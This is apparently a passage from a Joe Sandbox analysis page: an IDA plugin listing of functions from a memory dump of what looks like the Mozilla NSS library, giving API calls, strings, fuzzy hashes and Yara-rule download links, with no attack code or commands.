Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: ByteCharMultiWide$Alloc_UtilValue_wstat64i32freemalloc
String ID:
API String ID: 1642359729-0
Opcode ID: b72eac204c52050cbd61ae5d4810d4da6209ee15fd4ac98d24b23c9480e33a4f
Instruction ID: 5a6438b39592106daa3f554efda491b612022d4a4fd5611ca3d1342ab39f5437
Opcode Fuzzy Hash: b72eac204c52050cbd61ae5d4810d4da6209ee15fd4ac98d24b23c9480e33a4f
Instruction Fuzzy Hash: 4301F2B67051327BFB3056B65D0AE7B396CDB416A8F140635FD2CDA680EA118C00C2F1

Function 6C772CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C775B40: PR_GetIdentitiesLayer.NSS3 ref: 6C775B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C772CEC

Part of subcall function 6C78C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C78C2BF

PR_EnterMonitor.NSS3(?), ref: 6C772D02
PR_EnterMonitor.NSS3(?), ref: 6C772D1F
PR_ExitMonitor.NSS3(?), ref: 6C772D42
PR_ExitMonitor.NSS3(?), ref: 6C772D5B

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction ID: f8a87a54bbb84641c86fc01a1a6804a77bcf29ecc4728e88344084b95d568267
Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction Fuzzy Hash: 700108B19406049FEB309E26FE49BC7B7A1EF51358F004535E86986721D232F42587A2

Function 6C772D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C775B40: PR_GetIdentitiesLayer.NSS3 ref: 6C775B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C772D9C

Part of subcall function 6C78C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C78C2BF

PR_EnterMonitor.NSS3(?), ref: 6C772DB2
PR_EnterMonitor.NSS3(?), ref: 6C772DCF
PR_ExitMonitor.NSS3(?), ref: 6C772DF2
PR_ExitMonitor.NSS3(?), ref: 6C772E0B

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction ID: 4c0f5e16d258ba9720d838d746ca8099b39aafce653af2adea6d5279bc05a6b8
Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction Fuzzy Hash: 6601CCB1A402049FDF305E65FE0DBC777A5EF51358F004535E46946711D632F42586A2

Function 6C70AE30 Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 6C6F3090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C70AE42), ref: 6C6F30AA
Part of subcall function 6C6F3090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C6F30C7
Part of subcall function 6C6F3090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C6F30E5
Part of subcall function 6C6F3090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C6F3116
Part of subcall function 6C6F3090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C6F312B
Part of subcall function 6C6F3090: PK11_DestroyObject.NSS3(?,?), ref: 6C6F3154
Part of subcall function 6C6F3090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6F317E

SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6C6E99FF,?,?,?,?,?,?,?,?,?,6C6E2D6B,?), ref: 6C70AE67
SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6C6E99FF,?,?,?,?,?,?,?,?,?,6C6E2D6B,?), ref: 6C70AE7E
SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C6E2D6B,?,?,00000000), ref: 6C70AE89
PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6C6E2D6B,?,?,00000000), ref: 6C70AE96
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6C6E2D6B,?,?), ref: 6C70AEA3

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
String ID:
API String ID: 754562246-0
Opcode ID: 90caf67a23e108e13db83f6db2664a342317bfc81fde7045da7b2af0386403a2
Instruction ID: 88c88836932c0e4a58086bdb9e7c90e4bc2b9153f651c194d2d37d823f240f9c
Opcode Fuzzy Hash: 90caf67a23e108e13db83f6db2664a342317bfc81fde7045da7b2af0386403a2
Instruction Fuzzy Hash: 2001F4E6B1452057E701912CAE9BAAF32DC8F976ACF080031E809D7B01F611D90547E7

Function 6C7FBDB0 Relevance: 7.6, APIs: 5, Instructions: 51COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,6C7F7AFE,?,?,?,?,?,?,?,?,6C7F798A), ref: 6C7FBDC3
free.MOZGLUE(?,?,6C7F7AFE,?,?,?,?,?,?,?,?,6C7F798A), ref: 6C7FBDCA
PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C7F7AFE,?,?,?,?,?,?,?,?,6C7F798A), ref: 6C7FBDE9
free.MOZGLUE(?,00000000,00000000,?,6C7F7AFE,?,?,?,?,?,?,?,?,6C7F798A), ref: 6C7FBE21
free.MOZGLUE(00000000,00000000,?,6C7F7AFE,?,?,?,?,?,?,?,?,6C7F798A), ref: 6C7FBE32

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: free$CriticalDeleteDestroyMonitorSection
String ID:
API String ID: 3662805584-0
Opcode ID: 3e7043042b7b60ebeb2a7a9e9560c277306778bd74cdc4d010a4b0c09f115454
Instruction ID: 7b5834ee26f685b80479cc93f46c04f21c66b1cd2dc59e2711e0f8eb4eaaefcc
Opcode Fuzzy Hash: 3e7043042b7b60ebeb2a7a9e9560c277306778bd74cdc4d010a4b0c09f115454
Instruction Fuzzy Hash: 031113B1B092109FDB30EF69C849A023BF8BB5A25EB048079D51AC7700E739A414CBE2

Function 6C743E10 Relevance: 7.5, APIs: 5, Instructions: 45memoryfileCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,-00000001,?,00000000,?,6C743975), ref: 6C743E29
PORT_Alloc_Util.NSS3(00000000,?,00000000,?,6C743975), ref: 6C743E38

Part of subcall function 6C740BE0: malloc.MOZGLUE(6C738D2D,?,00000000,?), ref: 6C740BF8
Part of subcall function 6C740BE0: TlsGetValue.KERNEL32(6C738D2D,?,00000000,?), ref: 6C740C15

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,6C743975), ref: 6C743E52
DeleteFileW.KERNEL32(00000000), ref: 6C743E5D
free.MOZGLUE(00000000), ref: 6C743E64

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: ByteCharMultiWide$Alloc_DeleteFileUtilValuefreemalloc
String ID:
API String ID: 3873820591-0
Opcode ID: 7cdc61f814c4445b8f5ea900e11ae4934c0130363e73db6db0c74e65093de082
Instruction ID: 91b1d7cf0d84cca2ad0cb5772c746bc9e5e195bd09402bc8c9699920b56ed18a
Opcode Fuzzy Hash: 7cdc61f814c4445b8f5ea900e11ae4934c0130363e73db6db0c74e65093de082
Instruction Fuzzy Hash: 57F054B53061227BFA2026B95D49E77355CDB429B9F540735BE2DC55C2E940CC1183B1

Function 6C7F7C60 Relevance: 7.5, APIs: 5, Instructions: 40stringthreadCOMMON

Download Yara Rule

APIs

PR_Free.NSS3(?), ref: 6C7F7C73
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7F7C83
malloc.MOZGLUE(00000001), ref: 6C7F7C8D
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C7F7C9F
PR_GetCurrentThread.NSS3 ref: 6C7F7CAD

Part of subcall function 6C7A9BF0: TlsGetValue.KERNEL32(?,?,?,6C7F0A75), ref: 6C7A9C07

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: CurrentFreeThreadValuemallocstrcpystrlen
String ID:
API String ID: 105370314-0
Opcode ID: 5cb4bb504329fec6661dc8f4628fdf9c641bef2ad9f60c735e0ed5d7311f6824
Instruction ID: 283c24f05ea2f7f9a72e7aaac17ae84b3f149ae762661da877af65ab38132a14
Opcode Fuzzy Hash: 5cb4bb504329fec6661dc8f4628fdf9c641bef2ad9f60c735e0ed5d7311f6824
Instruction Fuzzy Hash: AAF0C2F19102166BEB009F7A9E4D947775CEF00265B018535E81DC3B00E731E516CAE5

Function 6C7FADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(6C7FA6D8), ref: 6C7FAE0D
free.MOZGLUE(?), ref: 6C7FAE14
DeleteCriticalSection.KERNEL32(6C7FA6D8), ref: 6C7FAE36
free.MOZGLUE(?), ref: 6C7FAE3D
free.MOZGLUE(00000000,00000000,?,?,6C7FA6D8), ref: 6C7FAE47

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: 332eb5b32f39e2c7fae24832ef3d8c988ebf61f370c638cc5265a63b135d677f
Instruction ID: 78429ee063c6aac6384dbcbbc1d39c209bb55a1a9da05ffcc0c4d8e765884b01
Opcode Fuzzy Hash: 332eb5b32f39e2c7fae24832ef3d8c988ebf61f370c638cc5265a63b135d677f
Instruction Fuzzy Hash: 57F0F6B6201A15ABCA309FA8D849917777CBF867787100738E53EC3A41D731E016D7D1

Function 6C687C40 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 100COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A0D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C687D35

Strings

database corruption, xrefs: 6C687D29
%s at line %d of [%.10s], xrefs: 6C687D2E
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C687D13, 6C687D1F, 6C687D47, 6C687D53, 6C687D5F

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: 900a188b1b0e744a2fa1ca789bda34e179e1fc14809e4748cf6a751e4d2e1dba
Instruction ID: a05d72d8a5d3475eb5b1360be4a579c41d70e5268df31f6175c6908cb16129b0
Opcode Fuzzy Hash: 900a188b1b0e744a2fa1ca789bda34e179e1fc14809e4748cf6a751e4d2e1dba
Instruction Fuzzy Hash: 54311271F052299BC720CF9EC8809BAB7E1EF89709B590596F448B7B81D274E841C7B8

Function 6C676C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C676D36

Strings

database corruption, xrefs: 6C676D2A
%s at line %d of [%.10s], xrefs: 6C676D2F
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C676D20

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: 3ebf939acb01ddc1b7a2348ec529b4e7a019f519089c14781923339d6602133e
Instruction ID: 155b748fa6ab2a70c423a9c413a4a0392bdb1e588fcbe3b562f046df3df93522
Opcode Fuzzy Hash: 3ebf939acb01ddc1b7a2348ec529b4e7a019f519089c14781923339d6602133e
Instruction Fuzzy Hash: 6421F4706243059BC720CF1ACA41B9AB7F1EF85318F244D2CD8499BF51E371F94487AA

Function 6C752FD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,-000000D4,00000000,?,<+ul,6C7532C2,<+ul,00000000,00000000,?), ref: 6C752FDA

Part of subcall function 6C7414C0: TlsGetValue.KERNEL32 ref: 6C7414E0
Part of subcall function 6C7414C0: EnterCriticalSection.KERNEL32 ref: 6C7414F5
Part of subcall function 6C7414C0: PR_Unlock.NSS3 ref: 6C74150D

PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6C75300B

Part of subcall function 6C7410C0: TlsGetValue.KERNEL32(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C7410F3
Part of subcall function 6C7410C0: EnterCriticalSection.KERNEL32(?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74110C
Part of subcall function 6C7410C0: PL_ArenaAllocate.NSS3(?,?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C741141
Part of subcall function 6C7410C0: PR_Unlock.NSS3(?,?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C741182
Part of subcall function 6C7410C0: TlsGetValue.KERNEL32(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74119C

SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6C75302A

Part of subcall function 6C740840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7408B4

Part of subcall function 6C72C3D0: PK11_ImportPublicKey.NSS3(?,?,00000000), ref: 6C72C45D
Part of subcall function 6C72C3D0: TlsGetValue.KERNEL32 ref: 6C72C494
Part of subcall function 6C72C3D0: EnterCriticalSection.KERNEL32(?), ref: 6C72C4A9
Part of subcall function 6C72C3D0: PR_Unlock.NSS3(?), ref: 6C72C4F4

Strings

<+ul, xrefs: 6C752FD0

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Value$ArenaCriticalEnterSectionUnlockUtil$Alloc_AllocateErrorFindImportK11_Mark_PublicTag_
String ID: <+ul
API String ID: 2538134263-3119354308
Opcode ID: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
Instruction ID: 94fdb0b58e4e98988f9e3150c2cecacde6ebe20426c460a25f9f256988417beb
Opcode Fuzzy Hash: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
Instruction Fuzzy Hash: A9110AB6B002046BDB009E65DD04A9B77DA9B8526CF188134F81CDB791FB72ED25C7E1

Function 6C7ACC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6C7ACD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C7ACC7B), ref: 6C7ACD7A
Part of subcall function 6C7ACD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C7ACD8E
Part of subcall function 6C7ACD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C7ACDA5
Part of subcall function 6C7ACD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C7ACDB8

PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C7ACCB5
memcpy.VCRUNTIME140(6C8414F4,6C8402AC,00000090), ref: 6C7ACCD3
memcpy.VCRUNTIME140(6C841588,6C8402AC,00000090), ref: 6C7ACD2B

Part of subcall function 6C6C9AC0: socket.WSOCK32(?,00000017,6C6C99BE), ref: 6C6C9AE6
Part of subcall function 6C6C9AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C6C99BE), ref: 6C6C9AFC

Part of subcall function 6C6D0590: closesocket.WSOCK32(6C6C9A8F,?,?,6C6C9A8F,00000000), ref: 6C6D0597

Strings

Ipv6_to_Ipv4 layer, xrefs: 6C7ACCB0

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
String ID: Ipv6_to_Ipv4 layer
API String ID: 1231378898-412307543
Opcode ID: b25e460e14036e8c00965d57c58160c98151348e59861ab602b6627770d6eea3
Instruction ID: 16e5c55c7c2590538bee8025a769b57b02e7a25b44e231d4468dd411c7b2f6d3
Opcode Fuzzy Hash: b25e460e14036e8c00965d57c58160c98151348e59861ab602b6627770d6eea3
Instruction Fuzzy Hash: B911D3F1B002406EDB20AF69DA8B7C33AB8934631CF169539E526CBB41E731C425CBD6

Function 6C711CC0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Initialize), ref: 6C711CD8
PR_LogPrint.NSS3( pInitArgs = 0x%p,?), ref: 6C711CF1

Part of subcall function 6C7F09D0: PR_Now.NSS3 ref: 6C7F0A22
Part of subcall function 6C7F09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C7F0A35
Part of subcall function 6C7F09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C7F0A66
Part of subcall function 6C7F09D0: PR_GetCurrentThread.NSS3 ref: 6C7F0A70
Part of subcall function 6C7F09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C7F0A9D
Part of subcall function 6C7F09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C7F0AC8
Part of subcall function 6C7F09D0: PR_vsmprintf.NSS3(?,?), ref: 6C7F0AE8
Part of subcall function 6C7F09D0: EnterCriticalSection.KERNEL32(?), ref: 6C7F0B19
Part of subcall function 6C7F09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C7F0B48
Part of subcall function 6C7F09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C7F0C76
Part of subcall function 6C7F09D0: PR_LogFlush.NSS3 ref: 6C7F0C7E

Strings

pInitArgs = 0x%p, xrefs: 6C711CEC
C_Initialize, xrefs: 6C711CD3

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: PrintR_snprintf$CriticalCurrentDebugEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime
String ID: pInitArgs = 0x%p$C_Initialize
API String ID: 1907330108-3943720641
Opcode ID: 017af82dce2bde1c42f7eb24667d2d7af3fb6070620a1631cd282dec9311d3ed
Instruction ID: 2e94542139bea07a912a06ea06165033c0e928b0c8fb7a3210b19b10772ed6e7
Opcode Fuzzy Hash: 017af82dce2bde1c42f7eb24667d2d7af3fb6070620a1631cd282dec9311d3ed
Instruction Fuzzy Hash: 3401C034209141DFCB20AB14DA4DB5A37B4EBD231EF088434E849C6F11EB34E849CAD2

Function 6C677F90 Relevance: 6.2, APIs: 4, Instructions: 223COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C6781DF
